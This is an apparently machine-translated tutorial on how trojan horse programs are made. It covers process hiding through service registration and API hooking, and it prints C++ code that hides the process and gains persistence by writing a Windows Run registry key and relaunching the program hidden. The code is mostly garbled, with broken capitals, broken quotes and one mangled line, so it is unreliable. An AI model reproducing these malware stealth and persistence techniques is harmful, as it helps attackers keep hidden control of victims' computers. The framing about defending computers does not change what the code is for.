In recent years, the hacking technology has gradually matured, posing a great threat to network security. One of the main attack methods of hackers is to use the trojan technology to penetrate into the host system of the other party, to remotely operate the target host. The destructive power of the Trojan cannot be ignored. How does a hacker make such a destructive Trojan? Below I will perform a detailed source code analysis on the Trojan, let's have a thorough view of the Trojan development technology, starting from understanding the trojan technology, to manage our computers more securely.
1. Trojan program classification
So far, Trojan technology has experienced four generations. The first generation is simple password theft and sending, with nothing special. The second generation of Trojans has made great technological progress. Glaciers can be said to be one of the typical representatives of Trojans in China. In terms of data transmission technology, third-generation Trojans have made significant improvements. The emergence of ICMP and other types of Trojans, the use of malformed packets to transmit data, increased the difficulty of detection and removal. The fourth generation trojan has made major changes in process hiding. It adopts the kernel plug-in method and uses the remote thread Insertion Technology to embed the DLL thread. You can also hook up the psapi to hide the trojan program. Even in Windows NT/2000, it achieves a good hiding effect. I believe that the fifth-generation Trojan will soon be compiled. For more details, refer to shotgun's article "unveil the secrets of Trojans".
2. Trojan program Hiding Technology
Most Trojans must be hidden on the server side to avoid being discovered. Let's see how Trojans are hidden.
When it comes to hiding, you must first understand three related concepts: Processes, threads, and services. Let me give a brief explanation.
Process: A normal Windows application generates a process in the system after running. At the same time, each process corresponds to a different PID (progress ID, process identifier) this process will be allocated a virtual memory space address segment by the system, and all related program operations will be carried out in this virtual space.
Thread: A process can have one or more threads. Multiple operations are performed simultaneously between threads. Generally, threads are independent of each other. When a thread encounters an error, it does not necessarily cause the entire process to crash.
Service: when a process works as a service, it will work in the background and will not appear in the task list. However, in Windows NT/2000, you can still use the service manager to check whether any service program is started and running.
To hide a Trojan's server, you can either hide it falsely or hide it. Pseudo-hiding means that the program's process still exists, but it just disappears into the process list. Hiding is to completely remove the program and do not work in a process or service.
The pseudo-hidden method is easier to implement. You only need to register the program on the Trojan server as a service. In this way, the program disappears from the task list, because the system does not regard it as a process, when CTRL + ALT + Delete is pressed, this program will not be seen. However, this method is only applicable to Windows 9x systems. For Windows NT and Windows 2000, you can find the services you have registered in the system through the Service Manager. Is it true that the pseudo-hidden method cannot be used in Windows NT/2000? Of course, there is another way, that is, the API Interception Technology. By setting up a background system hook and intercepting psapi enumprocessmodules and other related functions, we can control the process and service traversal calls, when the process ID (PID) is detected as the server-side Process of the Trojan program, it is skipped directly. In this way, process hiding is realized. software such as Kingsoft and Kingsoft are using similar methods, the textouta and textoutw functions are intercepted to capture screen output and implement real-time translation. Similarly, this method can be used to hide a process.
When the process is hidden, some of the Trojan's servers are running, so they should not have general processes or services. That is to say, they are completely integrated into the system kernel. Maybe you may wonder, isn't it just that a process will be generated after an application is running? Indeed, we can use it as a thread instead of an application, and the thread of other applications to inject itself into the address space of other applications. This application is an absolutely secure program for the system, which achieves a completely hidden effect. As a result, it increases the difficulty of scanning and killing hacker programs.
For the sake of security, I only provide a method to implement pseudo-hidden processes by registering a service program. For more complex and advanced hidden methods, such as remote thread insertion of other processes, see shotgun's article "hiding and detecting Trojan processes under the NT System".
Winapi winmain (hinstance, hinstance, lpstr, INT)
{
Try
{
DWORD dwversion = getversion (); // obtain the Windows version
If (dwversion> = 0x80000000) // Windows 9x hide the task list
{
INT (callback * RSP) (DWORD, DWORD );
Hinstance DLL = loadlibrary ("kernel32.dll"); // load kernel32.dll
RSp = (INT (callback *) (DWORD, DWORD) getprocaddress (DLL, "registerserviceprocess"); // find the entry of registerserviceprocess
RSP (null, 1); // register the service
Freelibrary (DLL); // release the DLL module
}
}
Catch (exception & exception) // handle exception events
{
// Handle abnormal events
}
Return 0;
}
3. Auto-Load Running Technology of Programs
There are many methods for self-running the program, except the most common method: loading the program to the Startup Group, write the program startup path to the HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ currentversions \ drivers startup parameters in the registry, the following shows a self-starting program by modifying the HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ currentversions \ Run key value:
Auto-load part:
Hkey;
Ansistring newprogramname = ansistring (sys) + ansistring ("+ pname/"> \ ") + pname
Unsigned long K;
K = reg_opened_existing_key;
Regcreatekeyex (HKEY_LOCAL_MACHINE,
"SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run \\",
0l,
Null,
Reg_option_non_volatile, key_all_access | key_set_value,
Null,
& Hkey, & K );
Regsetvalueex (hkey,
"Backgroup ",
0,
REG_SZ,
Newprogramname. c_str (),
Newprogramname. Length ());
Regclosekey (hkey );
If (INT (ShellExecute (handle,
"Open ",
Newprogramname. c_str (),
Null,
Null,
Sw_hide)> 32)
{
Wantclose = true;
Close ();
}
Else
{
Hkey;
Unsigned long K;
K = reg_opened_existing_key;
Long A = regcreatekeyex (HKEY_LOCAL_MACHINE,
"SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run ",
0,
Null,
Reg_option_non_volatile,
Key_set_value, null,
& Hkey, & K );
Regsetvalueex (hkey,
"Backgroup ",
0,
REG_SZ,
Programname. c_str (),
Programname. Length ());
Int num = 0;
Char STR [20];
DWORD lth = 20;
DWORD type;
Char strv [255];
Dword vl = 254;
DWORD suc;
Do {
Suc = regenumvalue (HKEY_LOCAL_MACHINE,
(DWORD) num, STR,
Null,
& Type,
Strv, & VL );
If (strcmp (STR, "Bgroup") = 0)
{
Deletefile (ansistring (strv ));
Regdeletevalue (HKEY_LOCAL_MACHINE, "Bgroup ");
Break;
}
} While (Suc = error_success );
Regclosekey (hkey );
}
Code for uninstalling a self-loaded program:
Int num;
Char str2 [20];
DWORD lth = 20;
DWORD type;
Char strv [255];
Dword vl = 254;
DWORD suc;
Do {
Suc = regenumvalue (HKEY_LOCAL_MACHINE,
(DWORD) num,
STR,
Null,
& Type,
Strv,
& VL );
If (strcmp (STR, "Bgroup") = 0)
{
Deletefile (ansistring (strv ));
Regdeletevalue (HKEY_LOCAL_MACHINE, "Bgroup ");
Break;
}
} While (Suc = error_success)
Hkey;
Unsigned long K;
K = reg_opened_existing_key;
Regcreatekeyex (HKEY_LOCAL_MACHINE,
"SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run ",
0,
Null,
Reg_option_non_volatile,
Key_set_value, null,
& Hkey,
& K );
Do {
Suc = regenumvalue (hkey, (DWORD) num, STR, if (strcmp (STR, "backgroup") = 0)
{
Deletefile (ansistring (strv ));
Regdeletevalue (HKEY_LOCAL_MACHINE, "backgroup ");
Break;
}
} While (Suc = error_success)
Regclosekey (hkey );
The self-loading part can be written using C ++ builder, Which is simpler:
Tregistry & regkey = * New Tregistry ();
Regkey. rootkey = HKEY_LOCAL_MACHINE;
Regkey. openkey ("SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run", true );
If (! Regkey. valueexists ("InterBase Server "))
{
Regkey. writestring ("InterBase Server ",
"D: \ Program Files \ Borland \ intrbase \ bin \ ibserver.exe ");
}
Regkey. closekey ();
Delete key;